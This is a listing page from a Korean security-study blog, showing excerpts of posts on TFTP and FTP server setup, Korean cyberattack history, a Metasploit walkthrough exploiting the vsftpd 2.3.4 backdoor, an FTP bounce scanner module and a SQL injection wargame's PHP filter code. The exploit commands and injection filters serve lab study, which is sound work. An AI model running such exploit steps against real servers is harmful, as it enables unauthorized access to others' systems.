목록전체보기 (375)

EASY7

[Linux] 취약한 프로토콜 TFTP Secure Mode 사용법

Trivial File Transfer Protocol; Trivial FTP 자체 디스크가 없는 OS에서 부팅에 필요한 데이터를 가져오기 위한 간소화된 FTP 신속한 파일의 전송을 원할 경우에는 FTP보다 활용이 용이하다. 보안에 매우 취약한 프로토콜이므로 가급적 사용하지 않는다. 비밀번호 인증 과정이 없다. secure mode로 운영해야 한다. UDP 69번 포트를 사용한다. 설치 방법 yum install tftp yum install tftp-server nano /etc/xinetd.d/tftp에서 disable=yes -> disable = no 로 변경 서비스 재시작 /etc/init.d/xinetd restart 서비스 동작 여부 확인 netstat -a | grep tftp #tftp ..
보안 공부/리눅스 2019. 8. 13. 21:37
SQL 인젝션..

보호되어 있는 글입니다.
개발 공부 2019. 8. 13. 17:06
연도별 보안 이슈 및 대표 취약점

2013년 1.25 대란 1.25~30 공격 유형 : 트래픽 과다(슬래머웜) 국내 인터넷망 전체 장애 1,875억원 피해 2009년 7.7 DDoS 대란 미국 독립 기념일(7월 4일) 기점으로 공격이 감지되기 시작하여 7월 7일에 DDOS 공격이 본격적으로 감행되었다. 국가기관, 포털, 금융, 보안 사이트 등 범국가적인 위험 수위까지 근접했었던 초유의 비상사태! 이때 이후로 국민들에게 DDoS와 악성코드 감염된 봇넷의 위험성을 각인시키게 된 계기가 되었다. 2011년 3.4 DDoS 3.4~7 국내외 36개 기관 웹서버 11만대 감염 PC파괴 농협해킹 4.12~ 30 APT 내부전산망 서버 서버 파괴(270대) 197억원 피해 2012년 핵티비즘 : 정치적인 의사를 표시하기 위함. 4.11 총선과 12...
보안 공부/최신 보안 동향 2019. 8. 11. 01:54
FTP 2.3.4 command execution

FTP backdoor AttackFTP 2.3.4 command execution msfconsole use exploit/unix/ftp/vsftpd_234_backdoor set rhost ip주소 set rport 21 run -j sessions : 연결된 세션 확인 session -i 세션id
보안 공부/취약점 실습 2019. 8. 10. 20:29
FTP bounce 취약점

https://www.youtube.com/watch?v=ptu4Nfn5jGI ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule 'FTP Bounce Port Scanner', 'Description' => %q{ Enumerate TCP services via the FTP bounce PORT/LIST method. }, 'Author' => 'kris katterjohn', 'License' => MSF_LICENSE ) register_options([ OptSt..
카테고리 없음 2019. 8. 10. 18:35
Kali FTP 설치

kali에서 FTP 깔기 1. ftp 설치하기 apt-get install ftp 2. vsftp 설치하기 apt-get install -y vsftpd 3. 설정 변경 nano /etc/vsftpd.conf 수정해야할 것. local_enable=yes (로컬 계정 접근 허용) write_enable=yes (로컬 계정 쓰기 허용) local_umask=022 (로컬 계정 umask) 각종 설정의 설명 anonymous_enable=NO (anonymous FTP 허용여부) local_enable=YES (로컬 계정 접근 허용) write_enable=YES (로컬 계정 쓰기 허용) local_umask=022 (로컬 계정 umask) xferlog_enable=YES (파일 전송 로그) xferlog..
보안 공부/리눅스 2019. 8. 10. 16:29
CentOS FTP 설치방법

CentOS에서 FTP 설치하기 1. ftp가 설치되어있는지 확인 rpm -qa | grep ftp 2. 설치 안되어있다면 vsftpd와 ftp 설치하기 vsftpd는 FTP서버를 사용할 수 있도록 해주는 데몬이며, ftp는 ftp 접속이 가능하도록 해주는 client 프로그램이다. yum install -y vsftpd ftp 3. 서비스 실행(부팅할 때마다 해줘야함) /etc/rc.d/init.d/vsftpd start (= service vsftpd start) 부팅시 자동으로 ftp 서버가 동작하도록 하려면 레벨을 조정해주면 된다. chkconfig --level 2345 vsftpd on 4. 제대로 작동 중인지 확인 netstat -atunp | grep vsftpd get /etc/passw..
보안 공부/리눅스 2019. 8. 10. 16:27
LOS 12번 문제

include "./config.php";   login_chk();   dbconnect();   if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");   if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");   if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");   $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";   echo "query : {$query}";   $result = @mysql_fetch_arr..
Project/Lord of SQL 2019. 8. 9. 23:24
Prev 1 ··· 22 23 24 25 26 27 28 ··· 47 Next